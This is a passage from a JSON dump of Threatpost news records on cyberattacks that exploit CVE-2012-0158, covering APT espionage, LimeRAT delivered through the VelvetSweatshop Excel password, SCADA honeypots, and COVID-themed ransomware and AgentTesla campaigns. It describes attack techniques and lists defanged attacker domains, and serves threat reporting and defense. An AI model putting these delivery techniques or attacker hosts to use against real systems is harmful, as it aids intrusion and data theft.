state-owned enterprises in China. Sure there is a military and political application to a lot of the information taken by Chinese groups, but the defining feature is secrets from economic sectors.\u201d\n", "modified": "2014-10-28T16:23:03", "published": "2014-10-28T12:23:03", "id": "THREATPOST:40683E270B24D8E2F0A7F7F90FDFE9A6", "href": "https://threatpost.com/russian-apt28-group-linked-to-nato-political-attacks/109049/", "type": "threatpost", "title": "Russian APT28 Group Linked to NATO, Political Attacks", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:15", "bulletinFamily": "info", "description": "[](<https://threatpost.com/tool-scans-rtf-files-spreading-malware-targeted-attacks-091412/>)Exploits embedded inside Microsoft Office documents such as Word, PDFs and Excel spreadsheets have been at the core of many targeted attacks during the past 24 months. Detection of these attack methods is improving and nimble hackers are recognizing the need for new avenues into enterprise networks. Some have been finding success using rich text format (RTF) files to spread malware that exploits Office vulnerabilities.\n\nResearcher Mila Parkour reported in June she\u2019d collected 90 RTF files over the course of three months, many with China-related file names and many [targeting specific industries](<http://contagiodump.blogspot.com/2012/06/90-cve-2012-0158-documents-for-testing.html>). All of them were exploiting [CVE-2012-0158](<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0158>), a [vulnerability in Active X controls within MSCOMCTL.OCX](<http://technet.microsoft.com/en-us/security/bulletin/ms12-027>)\u2013OLE files developed by Microsoft to allow object linking and embedding to documents and other files. Successful exploits allow remote attackers to execute code over the Web, Office docs, or RTF files.\n\n\u201cMany believe RTF is a relatively safe format, just as it was back in the day when people might not trust Word docs and would send PDFs around instead. Today, we chuckle at that,\u201d said Lenny Zeltser, a handler at the SANS Internet Storm Center. \u201cToday, Word and PDF documents are risky and people are sending RTF files. We can now see attackers finding ways to use RTF files in exploits.\u201d\n\nSome of the samples in the wild have been fairly sophisticated and difficult to examine, Zeltser said. Some, for example, have contained embedded portable executable files that are a challenge to find and extract without some heavy manual lifting. German security researcher Frank Boldewin, keeper of the [OfficeMalScanner toolkit](<http://reconstructer.org/main.html>), is among those recognizing this new trend. He updated the popular, freely available tool with RTFScan that can help identify RTF-based exploits and extract embedded artifiacts for examination.\n\n\u201cThe tool is fantastic for analyzing malicious RTF files,\u201d Zeltser said. \u201cAttackers are using more sophisticated ways of concealing artifacts in RTF files, which makes them harder to examine. The tool is designed to help a trained security analyst figure out the nature of the file, and if it\u2019s exploited, what happens next.\u201d\n\nIn one example posted on the ISC Diary today,[ RTFScan was able to find an embedded OLE object](<https://isc.sans.edu/diary/Analyzing+Malicious+RTF+Files+Using+OfficeMalScanner+s+RTFScan/14092>) that included the attacker\u2019s shellcode that would be executed by a vulnerable Word doc, Zeltser wrote. RTFScan was able to get around the obfuscation in place and extract the malicious embedded executable.\n\n\u201cRTFScan tells you where to find the shellcode, extract it and turn it into a Windows executable,\u201d he said. \u201cThis would allow an analyst to debug it and observe what happens after it executes, how the malware behaves. This is very important for analysts because the frequency of using Microsoft Office docs continues to be very common. The number of attacks is not shrikning and attackers find all sorts techniques to deliver payloads delivered with the help of Word, PDF, Excel and now RTF documents.\u201d\n", "modified": "2013-04-17T16:31:32", "published": "2012-09-14T17:25:21", "id": "THREATPOST:A617AB8E3147511D6E87F9782597BB64", "href": "https://threatpost.com/tool-scans-rtf-files-spreading-malware-targeted-attacks-091412/77014/", "type": "threatpost", "title": "Tool Scans for RTF Files Spreading Malware in Targeted Attacks", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-04-09T11:23:58", "bulletinFamily": "info", "description": "Researchers have discovered a fresh campaign using Excel files to spread LimeRAT malware \u2013 making use of the hardcoded, VelvetSweatshop default password for encrypted files.\n\n[LimeRAT](<https://github.com/NYAN-x-CAT/Lime-RAT>) is a full-featured remote access tool/backdoor that can allow attackers to access an infected system and install a range of malware strains, like ransomware, cryptominers, keyloggers or botnet clients.\n\nIn the observed campaign, threat actors are creating read-only Excel files containing a LimeRAT payload. Typically in malspam scenarios involving Excel files, the files are encrypted and the recipient would need to use a password to decrypt the file. That password is usually included by an attacker in the body of a socially engineered email.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe new attack however, uses a different tack\u2014it sends malicious, encrypted Excel files using \u201cread-only\u201d mode, according to Mimecast Threat Center\u2019s Matthew Gardiner.\n\n\u201cThis campaign is notable because it shows off how cybercriminals are continuing to build on \u2018old\u2019 underlying techniques to deliver exploits, even ones that companies are well aware exist,\u201d Gardiner told Threatpost.\n\nTo decrypt any given encrypted Excel file, Excel first tries to use an embedded, default password, \u201cVelvetSweatshop,\u201d to decrypt and open the file and run any onboard macros or other potentially malicious code. At the same time, it keeps the file in read-only mode, the researcher explained, writing in a Tuesday [blog post](<https://www.mimecast.com/blog/2020/03/velvetsweatshop-microsoft-excel-spreadsheet-encryption-rises-again-to-deliver-limerat-malware/>) about the research.\n\nIf Excel fails to decrypt the file using the \u201cVelvestSweatshop\u201d password, the app will request that the user insert a password. However, in read-only mode, this step is skipped, Gardiner said \u2013 and therein lies the new campaign\u2019s threat.\n\n\u201cThe Microsoft Office system will not generate any warning dialogs other than noting the file is read-only,\u201d he wrote in the post. \u201cUsing this read-only technique, the attacker can reap the obfuscation benefits of file encryption without requiring anything further from the user, taking away one step required of the intended victim for exploitation to occur.\u201d\n\nThis makes it even easier for unsuspecting victims to open them and spread malware.\n\n\u201cThis new research demonstrates that making an Excel file read-only \u2014 as opposed to locking it \u2014 encrypts the file without the need for an external created password to open it, making it easier to fool a victim into installing the malware,\u201d wrote Gardiner.\n\nIn the current campaign, Mimecast researchers also said that the cybercriminals used \u201ca blend of other techniques in an attempt to fool anti-malware systems by encrypting the content of the spreadsheet hence hiding the exploit and payload,\u201d Gardiner added.\n\nThe hardcoded password is a well-known issue addressed in 2012 (CVE-2012-0158) that was also [presented at Virus Bulletin](<https://nakedsecurity.sophos.com/2013/04/11/password-excel-velvet-sweatshop/>) in 2013. Mimecast said it has notified Microsoft that the vulnerability is once again being used.\n\n\u201cThe VelvetSweatshop technique has developed continuously to be leveraged as an underlying capability for attacks that can be more targeted and more sophisticated, thus making spear-phishing more successful,\u201d Gardiner told Threatpost \u201cThere does not appear to be a change or fix from Microsoft in the works. In that case, in order to improve defenses against this method, organizations must use more sophisticated anti-malware technology to monitor traffic and train users to be more cyber-aware.\u201d\n\nMicrosoft Office applications like Excel files are a popular means for malware delivery due to their widespread use and recognizability, according to Mimecast. \u201cCertainly, few are ever surprised to receive invoices or financial spreadsheet attachments via email,\u201d Gardiner wrote.\n\nIt\u2019s unlikely that LimeRAT will be the only payload distributed using this tactic: \u201cOf course, given the general capability inherent with this Excel-based malware delivery technique, any type of malware is a good candidate for delivery, so Mimecast researchers expect to see it used in many more malicious phishing campaigns in the future,\u201d Gardiner observed.\n\nTo avoid being the victim of such an attack, Mimecast recommended close scrutiny of all emails with files attached, as well as, on an administrative level, monitoring network traffic for outbound connections to likely command-and-control (C2) services. Also, continuously updating endpoint security systems to bolster detection of malware loading or running on the host also can mitigate attacks, Mimecast said.\n\nThe danger is of course exacerbated by the [work-from-home (WFH) phenomenon](<https://threatpost.com/working-from-home-covid-19s-constellation-of-security-challenges/153720/>) that\u2019s emerged in the wake of the COVID-19 pandemic.\n\n\u201cWhat\u2019s old is new again, as is the case with this latest campaign leveraging the LimeRAT trojan embedded within Excel files,\u201d Tal Zamir, CTO and co-founder at Hysolate, said in an emailed comment. \u201cThe challenge, however, is that many of us are now working from home; our guard may be down, we may be juggling everything from our jobs to teaching our kids from home, and trying to stay in touch with friends and family during these challenging times. Given this, it\u2019s highly likely that we\u2019re managing the majority of these communications \u2013 email, file sharing, web conferencing, etc. \u2014 all from the same laptop \u2014 which is no longer sitting behind our corporate firewalls, IDS/IPS, or other protections that would normally be in place when working from our corporate offices.\u201d\n\n[](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>)\n\n_**Do you suffer from Password Fatigue? On [Wednesday April 8 at 2 p.m. ET](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) join **_**_Duo Security and Threatpost as we explore a [passwordless](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) future. This [FREE](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) webinar maps out a future where modern authentication standards like WebAuthn significantly reduce a dependency on passwords. We\u2019ll also explore how teaming with Microsoft can reduced reliance on passwords. [Please register here](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) and dare to ask, \u201c[Are passwords overrated?](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>)\u201d in this sponsored webinar. _**\n", "modified": "2020-03-31T17:14:38", "published": "2020-03-31T17:14:38", "id": "THREATPOST:2FC50917F19F5A13F14EBE274E190CD9", "href": "https://threatpost.com/velvetsweatshop-bug-resurrected-limerat/154310/", "type": "threatpost", "title": "8-Year-Old VelvetSweatshop Bug Resurrected in LimeRAT Campaign", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T22:55:42", "bulletinFamily": "info", "description": "Diplomats and military personnel in India have been victimized in targeted espionage attacks that use a number of means of infection including phishing and watering hole sites.\n\nResearchers at Proofpoint this week published a report on [Operation Transparent Tribe](<https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf>), which was ongoing as of Feb. 11 when Proofpoint uncovered live attacks against Indian diplomats operating in embassies in Saudi Arabia and Kazakhstan. Proofpoint found IP addresses in Pakistan involved in the attacks, which involved an elaborate network of watering hole websites and multiple phishing email campaigns.\n\nThe sustained campaign\u2019s goal, Proofpoint said, was designed to allow attackers to drop a remote access Trojan it calls MSIL/Crimson. The Trojan had a variety of data exfiltration functions, including access to laptop cameras, screen capture functionality and keylogging.\n\nKevin Epstein, VP of threat operations center at Proofpoint told Threatpost that uncovering nation-state cyber espionage is one thing, but being able to expose it as it is happening is rare.\n\n\u201cThis is a multi-year and multi-vector campaign clearly tied to state sponsored espionage,\u201d he said. \u201cIn the world of crimeware, you rarely see this type of complexity. A nation state using multiple vectors, that\u2019s significant.\u201d\n\nHacking has become an increasingly popular and effective weapon in geopolitical conflicts, Epstein said. Groups with ties to most major powers are increasingly using targeted attack campaigns for political and competitive advantage and as a way to perpetrate attacks on critical infrastructure.\n\nEpstein said that typically security analysts only get wind of past campaigns that offer limited insight into pieces of the attack puzzle. With this recent discovery, he said, Proofpoint was able to identify all aspects of the campaign as it was being carried out.\n\n\u201cThis was an elaborate advanced persistent threat that required setting up multiple websites, multiple registrations, a build-out of full content sites and hosting sites,\u201d Epstein said.\n\nOne attack vector include email attachments that included weaponized RTF documents utilizing the four-year-old [CVE-2012-0158 Microsoft ActiveX vulnerability](<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0158>) that dropped an embedded, encoded portable executable.\n\n\u201cMSIL/Crimson is a logical extension of existing malware. This discovery is less about the bits and bytes of a specific malware,\u201d Epstein said.\n\nMSIL/Crimson, Epstein said, is a stealthy package of exploits. After successful exploitation and decoding of the embedded payload, MSIL/Crimson will be executed on the victim\u2019s machine. The first stage in infection is a downloader whose purpose is to download the more fully featured remote access Trojan component, he said.\n\nOther attack vectors for MSIL/Crimson included fake blogs and news websites that contained links to malicious payloads via text and image hyperlinks and desirable files that contained MSIL/Crimson.\n\n\u201cThese were sites that generated content that was designed to interest people in the armed forces,\u201d Epstein said. \u201cThe attackers used topical and original content compelling enough to entice readers to share stories, links and downloads with others in the armed services.\u201d\n\nIn Proofpoint\u2019s analysis of the MSIL/Crimson it wrote: \u201cMany of the campaigns and attacks appear related by common IOCs, vectors, payloads, and language, although the exact nature and attribution associated with this advanced persistent threat remains under investigation.\u201d\n", "modified": "2016-03-10T14:44:44", "published": "2016-03-04T17:35:42", "id": "THREATPOST:0B96DF7B8D0B80F9F8340D753646049C", "href": "https://threatpost.com/espionage-malware-watering-hole-attacks-target-diplomats/116600/", "type": "threatpost", "title": "Proofpoint Warns Of New MSIL/Crimson Tied To Cyber Espionage", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:01:05", "bulletinFamily": "info", "description": "With antiquated gear running the country\u2019s industrial control systems that oversee critical infrastructure, it\u2019s no shock attackers targeting SCADA networks do their fair share of reconnaissance looking for weak spots in that equipment.\n\nA researcher decided to put that theory to a practical test recently when he deployed three dummy websites, honeypots essentially, that accurately mimicked Internet-facing management interfaces for a real-world water pressure station, a server hosting a human machine interface (HMI) system and another machine hosting a real programmable logic controller (PLC).\n\nWhat threat researcher Kyle Wilhoit of Trend Micro found during a 28-day trial was that attackers are determined to access SCADA networks and ICS devices and come armed not only with working knowledge of devices and their default configurations, but with purpose-built malware, and the desire to modify industrial processes if they\u2019re able to successfully access a system.\n\n\u201cI didn\u2019t expect the attack scenarios I saw happen,\u201d Wilhoit told Threatpost. \u201cI didn\u2019t expect attackers to look at the site admin stuff and deeper into the company behind the gear. I can now draw a parallel to the reconnaissance attackers do on companies and infrastructure; we see a lot of those parallels on devices now.\u201d\n\nDuring the trial, 39 attacks were carried out against the honeypots, originating in 14 countries, most of them coming from China, Laos and the United States. For the purposes of his [research](<http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-whos-really-attacking-your-ics-equipment.pdf>), which was presented at Black Hat EU last week, Wilhoit did not consider automated port scans and SQL injection attempts as attacks. The only attempts considered attacks were those that were a threat to a secure area of the websites, attempts to modify a controller, attacks on specific SCADA protocols such as Modbus, and attempts to gain access to cause damage.\n\nThe sites were left exposed online with default configurations, including default credentials such as admin/admin or SA/SA. Text on the sites was optimized for search engines so that Google and others would easily find them, and the server names, for example, were fairly attractive names such as SCADA-1.\n\nThe result was a disturbing view into the activities around these critical systems. One incursion was able to gain access to a supposed water pumping station and shut it down or modify water output temperatures, in one case to 170 degrees Fahrenheit.\n\n\u201cThey logged in, made a modification and logged out,\u201d Wilhoit said. \u201cThese were repeat attacks based on default credentials for specific ICS and SCADA equipment. They were able to modify it directly and perform what was perceived to be catastrophic damage. They definitely thought they were successful.\u201d\n\nWilhoit said 12 of the attacks were unique and targeted the specific equipment in use; 13 were repeated by the same attackers, indicating some sort of automation and targeting. Some attackers would come back at the same times twice a day and try to exploit the same vulnerabilities over and over, or move on to new attacks once they were unable to exploit one.\n\nMost of the attacks logged by the honeypots were unauthorized access attempts to diagnostics pages, or attempts to modify Modbus traffic; Modbus is a communications protocol specific to ICS and SCADA equipment. One of the malware attacks originated with a spear phishing email carrying a malicious Word document exploiting [CVE-2012-0158](<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0158>), a vulnerability that enables remote code execution used in many targeted attacks. Another attack attempted to use an unauthorized Modbus client to gain read/write access to the PLC honeypot, a sign reconnaissance is occurring, Wilhoit said.\n\nThe bigger question, however, is why. Why is this gear online with default credentials and configurations and how many attacks where pumping stations are shut down or water temperature is modified occur?\n\n\u201cThe primary reason this is occurring is that these systems were deployed 20 to 30 years ago, prior to security architecture being the way it is today,\u201d Wilhoit said. \u201cThe technology gap has gotten a lot larger, and ICS hasn\u2019t caught up to where security infrastructure is at right now. It\u2019s difficult for devices to be turned down; that will halt business in that sector for some time. If you reboot a server, coal is not coming out of the ground. That affects the bottom line.\n\n\u201cIt also begs the question: Are companies disclosing it, or are they even aware it\u2019s occurring,\u201d Wilhoit said. \u201cThere\u2019s quite a big separation from the security guy and the ICS engineer whose main responsibility is to ensure devices stay up and are operational. Would they even be aware? I don\u2019t know, but I\u2019d be comfortable in saying these types of attacks are occurring.\u201d\n", "modified": "2013-05-07T19:38:25", "published": "2013-03-19T19:04:12", "id": "THREATPOST:BBF9233468A677A95C5E9D149089804E", "href": "https://threatpost.com/attacks-scada-ics-honeypots-modified-critical-operations-031913/77642/", "type": "threatpost", "title": "Attacks on SCADA, ICS Honeypots Modified Critical Operations", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:47", "bulletinFamily": "info", "description": "A new malware campaign has been hitting Pakistan hard over the last few months and after a little e-sleuthing, it appears the not-so-stealthy attacks have been originating from nearby India and exploiting a certificate to run its binaries.\n\nSecurity firm Eset has a full rundown of the campaign today on its [WeliveSecurity.com](<http://www.welivesecurity.com/2013/05/16/targeted-threat-pakistan-india/>) blog by malware researcher Jean-Ian Boutin, including an array of details involving how the attack has been executed and the types of payloads being deployed on unsuspecting Pakistanis\u2019 computers.\n\nThis campaign relies on the exploitation of a bogus, digitally signed certificate from the Indian company Technical and Commercial Consulting Pvt. Ltd. Initially issued in 2011 and revoked for files used after March 2012. Still though the cert was still used to sign more than 70 different malicious binaries on and off from that March until September of that year.\n\nThe malware uses two vectors \u2013 the first is a well-known Word document vulnerability, CVE-2012-0158, that\u2019s been used in everything from the [Red October campaign](<http://threatpost.com/rocra-espionage-malware-campaign-uncovered-after-five-years-activity-011413/>) to a bevy of [attacks against Tibetan and Uyghur users](<http://threatpost.com/researchers-uncover-targeted-attack-campaign-using-android-malware-032613/>) as of late. The other vector spread Word and PDF files that once opened, \u201cdownloads and executes additional malicious binaries.\u201d Some of those files are disguised as \u201cpakistandefencetoindiantopmiltrysecreat.exe\u201d and \u201cpakterrisiomforindian.exe,\u201d according to the blog post.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2013/05/07045755/pakistan_india.jpg>)\n\nPayloads are set up to glean data \u2013 screenshots, keystrokes, documents in the computer\u2019s trash \u2013 from users\u2019 computers and in turn send them to the attackers\u2019 servers. Interestingly enough, as Boutin notes, the information is being uploaded to the attacker\u2019s computer unencrypted, so it\u2019s easy to see what exactly is being transferred.\n\nThe blog also notes a number of Indian connections, including the mysterious Indian code signing certificate, references to Indian culture in the binaries and signing timestamps between 5:06 and 13:45, consistent with eight hour shifts worked in India.\n\nAn accompanying graph in the blog entry suggests that while other nations are being hit by the campaign, it\u2019s largely affecting Pakistan, with 79 percent of the targets affecting that South Asian country.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2013/05/07045751/detection_distribution.png>)\n\nA similar type of malware, [Redpill](<http://threatpost.com/data-stealing-spyware-redpill-back-targeting-india-041113/>), was found hijacking users in India last month. That campaign also stole screenshots, in addition to bank account credentials and email information and was the second coming of a malware strain that made its first appearance in 2008.\n\nBoutin\u2019s full research on the malware targeting Pakistan is being presented at the Caro Workshop, a security conference in Bratislava, Slovakia tomorrow. For more on his research, head to [ESET\u2019s blog](<http://www.welivesecurity.com/2013/05/16/targeted-threat-pakistan-india/>).\n", "modified": "2013-05-16T20:04:21", "published": "2013-05-16T16:04:21", "id": "THREATPOST:7719EB430C620858B2504EA847A9A096", "href": "https://threatpost.com/new-india-based-spy-malware-campaign-targeting-pakistanis/100664/", "type": "threatpost", "title": "Spyware Campaign Originating in India Targeting Pakistanis", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-04-15T20:07:18", "bulletinFamily": "info", "description": "Recent malware campaigns reveal that cybercriminals aren\u2019t sparing healthcare firms, medical suppliers and hospitals on the frontlines of the coronavirus pandemic.\n\nResearchers have shed light on two recently uncovered malware campaigns: one targeting a Canadian government healthcare organization and a Canadian medical research university, and the other hitting medical organizations and medical research facilities worldwide.\n\nThe emails sent to these unnamed organizations purported to send COVID-19 medical supply data, critical corporate communications regarding the virus or coronavirus details from the World Health Organization (WHO) \u2013 but actually aimed to distribute ransomware, infostealer malware and more.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThese recent campaigns are the tip of the iceberg when it comes to cybercrime targeting organizations in the healthcare space, researchers said. \u201cDespite prior reporting by various sources indicating that some cyber-threat attacker activity may subside in some respects during the COVID-19 pandemic, Unit 42 has observed quite the opposite with regard to COVID-19 themed threats, particularly in the realm of phishing attacks,\u201d said Adrian McCabe, Vicky Ray and Juan Cortes, security researchers with Palo Alto Networks\u2019 Unit 42 team, [in a Tuesday post.](<https://unit42.paloaltonetworks.com/covid-19-themed-cyber-attacks-target-government-and-medical-organizations/>)\n\n**Ransomware Attacks**\n\nBetween March 24 \u2013 30, researchers observed various malicious emails attempting to spread ransomware to several individuals associated with an unnamed Canadian government health organization actively engaged in COVID-19 response efforts, as well as a Canadian university that is conducting COVID-19 research.\n\nThe emails, sent from a spoofed WHO email address (noreply@who[.]int), contained a rich text format (RTF) file that purported to spread information about the pandemic. When opened, the RTF file attempted to deliver a ransomware payload that exploits a known vulnerability ([CVE-2012-0158](<https://nvd.nist.gov/vuln/detail/CVE-2012-0158>)) in Microsoft Office, which allows attackers to execute arbitrary code.\n\nWhen opened, the malicious attachment dro[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/04/14112324/Figure-3.-Ransomware-notification-image-1.png>)ps a ransomware binary to the victim\u2019s disk and then executes it. To avoid detection, the dropped binary has a hidden attribute set, which is used when some content is obsolete and no longer necessary, to completely hide details from the user. The binary also uses an Adobe Acrobat icon to further cloak its true purpose.\n\nAfter further analysis of the code structure of the binary and the host-based and network-based behaviors, researchers determined that the malware is an open-source [ransomware variant called EDA2](<https://threatpost.com/criminals-peddling-affordable-alphalocker-ransomware/117888/>), which is associated with a larger, parent ransomware family called [HiddenTear.](<https://threatpost.com/low-cost-ransomware-service-discovered/125017/>)\n\nAfter execution, the victim receives a ransomware infection notification display on their desktop, which states: \u201cIf you want to unlock your files you must sent .35 BTC [Bitcoin] to this address,\u201d and then gives an address for where to send the ransom payment. The ransomware binary then encrypts various files extensions, including \u201c.DOC\u201d, \u201c.ZIP\u201d, \u201c.PPT\u201d and more. Of note, \u201cthis ransomware binary has a particularly substantial limitation; it is hardcoded to only encrypt files and directories that are on the victim\u2019s desktop,\u201d said researchers.\n\nResearchers said the ransomware samples in this campaign weren\u2019t successful in reaching their intended victims. Other targets haven\u2019t been so lucky, however. Despite ransomware gangs [recently pledging that they would stop](<https://www.bleepingcomputer.com/news/security/ransomware-gangs-to-stop-attacking-health-orgs-during-pandemic/>) attacking hospitals in the midst of the pandemic, cyberattacks continue. Several hospitals have been targeted by the Ryuk ransomware, [according to security researcher \u201cPeterM\u201d on Twitter](<https://twitter.com/AltShiftPrtScn/status/1243166479903834112?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1243166479903834112&ref_url=https%3A%2F%2Fkasperskycontenthub.com%2Fthreatpost-global%2Fwp-admin%2Fpost.php%3Fpost%3D154768%26action%3Dedit>).\n\n> I can confirm that [#Ryuk](<https://twitter.com/hashtag/Ryuk?src=hash&ref_src=twsrc%5Etfw>) ransomware are still targeting \nhospitals despite the global pandemic. I'm looking at a US health care provider at the moment who were targeted overnight. Any HC providers reading this, if you have a TrickBot infection get help dealing with it ASAP.\n> \n> \u2014 PeterM (@AltShiftPrtScn) [March 26, 2020](<https://twitter.com/AltShiftPrtScn/status/1243166479903834112?ref_src=twsrc%5Etfw>)\n\nHammersmith Medicines Research, a London-based healthcare provider that was working with the British government to test COVID-19 vaccines, was also [recently hit by a ransomware attack](<https://www.computerweekly.com/news/252480425/Cyber-gangsters-hit-UK-medical-research-lorganisation-poised-for-work-on-Coronavirus>). The Maze ransomware operators, which launched the attack, later posted the stolen data online.\n\n**Malware Attacks**\n\nUnit 42 researchers also spotted a separate campaign targeting various organizations, including medical organizations and medical research facilities located in Japan and Canada, with the [AgentTesla malware](<https://threatpost.com/malware-steals-info-with-advanced-obfuscation/150280/>).\n\nOther firms targeted by this malware include a United States defense research entity, a Turkish government agency managing public works, a German industrial manufacturing firm, a Korean chemical manufacturer, and medical organizations/research facilities located in Japan and Canada (all unnamed).\n\nThe malspam emails used the coronavirus as a lure, with a malicious attachment pretending to be a \u201cCOVID-19 Supplier Notice\u201d or a \u201cCorporate advisory\u201d for coronavirus.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/04/14112408/covid-19-malspam-liquidroam.png>)\n\nThe email address sending the malspam emails, \u201cShipping@liquidroam[.]com,\u201d uses a legitimate business domain for LiquidRoam, which provides sales of electric skateboards. This led researchers to conclude that the domain has been compromised and that the infrastructure is being used by cybercriminals.\n\nThe attachments for the emails were actually droppers delivering variants of the AgentTesla malware family. AgentTesla,[ an info-stealing malware](<https://threatpost.com/advanced-obfuscation-info-stealing-campaign/152468/>) which has been around since 2014, is sold in multiple forums commonly visited by cybercriminals, and is one of the top malware families of choice of the SilverTerrier threat actor, known for business email compromise (BEC) campaigns.\n\n\u201cAll the associated samples connected to the same C2 domain for exfiltration: \u2018ftp[.]lookmegarment[.]com,'\u201d researchers said. \u201cOur analysis also shows that the AgentTesla samples had hard-coded credentials used to communicate with the C2 over FTP.\u201d\n\nAttackers continue to leverage [coronavirus-themed cyberattacks](<https://threatpost.com/coronavirus-themed-cyberattacks-persists/153493/>) as panic around the global pandemic continues \u2013 including[ malware attacks](<https://threatpost.com/coronavirus-propagate-emotet/152404/>), booby-trapped URLs and credential-stuffing scams.\n\n\u201cIt is clear from these cases that the threat actors who profit from cybercrime will go to any extent, including targeting organizations that are on the front lines and responding to the pandemic on a daily basis,\u201d said Unit 42 researchers.\n\n**_Worried about your cloud security in the work-from-home era? On _****_April 23 at 2 p.m. ET_****_, join DivvyCloud and Threatpost for a FREE webinar, _**[**_A Practical Guide to Securing the Cloud in the Face of Crisis_**](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)**_. Get exclusive research insights and critical, advanced takeaways on how to avoid cloud disruption and chaos in the face of COVID-19 \u2013 and during all times of crisis. _**[**_Please register here_**](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)_** for this sponsored webinar.**_\n", "modified": "2020-04-14T16:07:07", "published": "2020-04-14T16:07:07", "id": "THREATPOST:FF75AF79B23F8B0D0CF546FC055B7911", "href": "https://threatpost.com/cyberattacks-healthcare-orgs-coronavirus-frontlines/154768/", "type": "threatpost", "title": "Cyberattacks Target Healthcare Orgs on Coronavirus Frontlines", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T22:56:14", "bulletinFamily": "info", "description": "Chinese president Xi Jinping is supposed to have dinner this evening with U.S. president Barack Obama. Wonder if the name Ge Xing will come up?\n\nGe Xing is the subject of a joint [report](<http://cdn2.hubspot.net/hubfs/454298/Project_CAMERASHY_ThreatConnect_Copyright_2015.pdf?t=1443030820943&submissionGuid=81f1c199-859f-41e9-955b-2eec13777720>) published this morning by ThreatConnect and Defense Group Inc., computer and national security service providers respectively. Ge is alleged to be a member of the People\u2019s Liberation Army unit 78020, a state-sponsored hacking team whose mission is to collect intelligence from political and military sources to advance China\u2019s interests in the South China Sea, a key strategic and economic region in Asia with plenty of ties to the U.S.\n\nThe report connects PLA 78020 to the Naikon advanced persistent threat group, a state-sponsored outfit that has followed the APT playbook to the letter to infiltrate and steal sensitive data and intellectual property from military, diplomatic and enterprise targets in a number of Asian countries, as well as the United Nations Development Programme and the Association of Southeast Asian Nations (ASEAN).\n\nControl over the South China Sea is a focal point for China; through this region flows trillions of dollars of commerce and China has not been shy about claiming its share of the territory. The report states that China uses its offensive hacking capabilities to gather intelligence on adversaries\u2019 military and diplomatic intentions in the regions, and has leveraged the information to strengthen its position.\n\n\u201cThe South China Sea is seen as a key geopolitical area for China,\u201d said Dan Alderman, deputy director of DGI. \u201cWith Naikon, we see their activity as a big element of a larger emphasis on the region and the Technical Reconnaissance Bureau fitting into a multisector effort to influence that region.\u201d\n\nThe report is just the latest chess piece hovering over Jinping\u2019s U.S. visit this week, which began in earnest yesterday with a visit to Seattle and meetings with giant technology firms such as Microsoft, Apple and Google, among others. Those companies want to tap into the growing Chinese technology market and the government there is using its leverage to get them to support stringent Internet controls imposed by the Chinese government.\n\nA letter sent to American technology companies this summer, a _[New York Times](<http://www.nytimes.com/2015/09/17/technology/china-tries-to-extract-pledge-of-compliance-from-us-tech-firms.html>)_ report last week, said that China would ask American firms to store Chinese user data in China. China also reportedly asked U.S.-built software and devices sold in China to be \u201csecure and controllable,\u201d which likely means the Chinese would want backdoor access to these products, or access to private encryption keys.\n\nJinping, meanwhile, tried to distance himself from the fray when he said in a _Wall Street Journal _interview: \u201cCyber theft of commercial secrets and hacking attacks against government networks are both illegal; such acts are criminal offences and should be punished according to law and relevant international conventions.\u201d\n\n_Journal_ reporter [Josh Chin connected with Ge Xing over the phone](<http://www.wsj.com/articles/cyber-sleuths-track-hacker-to-chinas-military-1443042030>) and Ge confirmed a number of the dots connected in the report before hanging up on the reporter and threatening to report him to the police. While that never happened, the infrastructure connected to Ge and this slice of the Naikon APT group, was quickly shut down and taken offline.\n\nIn May, researchers at Kaspersky Lab published a report on [Naikon](<https://securelist.com/analysis/publications/69953/the-naikon-apt/>) and documented five years of activity attributed to the APT group. It describes a high volume of [geo-politically motivated attacks](<https://securelist.com/blog/research/70029/the-naikon-apt-and-the-msnmm-campaigns/>) with a high rate of success infiltrating influential organizations in the region. The group uses advanced hacking tools, most of which were developed externally and include a full-featured backdoor and exploit builder.\n\nLike most APT groups, they craft tailored spear phishing messages to infiltrate organizations, in this case a Word or Office document carrying an exploit for CVE-2012-0158, a favorite target for APT groups. The vulnerability is a buffer overflow in the ActiveX controls of a Windows library, MSCOMCTL.OCX. The exploit installs a remote administration tool, or RAT, on the compromised machine that opens a backdoor through which stolen data is moved out and additional malware and instructions can be moved in.\n\nChin\u2019s article describes a similar attack initiated by Ge, who is portrayed not only as 